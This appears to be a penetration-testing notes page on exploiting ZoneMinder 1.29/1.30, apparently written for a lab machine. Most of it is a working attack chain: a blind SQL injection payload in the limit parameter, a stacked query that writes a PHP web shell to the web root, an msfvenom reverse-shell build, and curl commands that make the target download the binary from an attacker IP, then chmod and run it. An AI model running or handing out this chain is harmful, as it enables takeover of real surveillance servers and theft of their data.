ZoneMinder

ZoneMinder is an open-source video surveillance platform for Linux that supports various camera types and provides web-based monitoring and recording. Its exposed web interface and reliance on backend services make it a common target for exploitation, especially when misconfigured or running vulnerable versions.

v1.29 & v1.30

ZoneMinder 1.29/1.30 is vulnerable to blind SQLi in the limit parameter of the index.php page, which accepts POST requests. This flaw allows stacked queries on MySQL versions greater than 5.0.11, enabling attackers to execute arbitrary SQL commands, including time-based delays (PoC).

&limit=100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434

Get a webshell:

limit=100;SELECT "<?php echo shell_exec($_GET['c']); ?>" INTO OUTFILE '/var/www/html/webshell.php';#&minTime=1466674406.084434

Upgrade it to reverse shell:

# Create a reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf

# Copy binary to the target
curl -s "http://<target-IP>:3305/webshell.php?c=wget+192.168.45.170/revshell.elf+-O+/tmp/revshell.elf"

# Assign executable permissions to the binary
curl -s "http://pebbles:3305/webshell.php?c=chmod+777+/tmp/revshell.elf"

# Execute the binary
curl -s "http://pebbles:3305/webshell.php?c=/tmp/revshell.elf"

PreviousSimplePHPGal NextCommon Findings

Last updated 9 days ago

Was this helpful?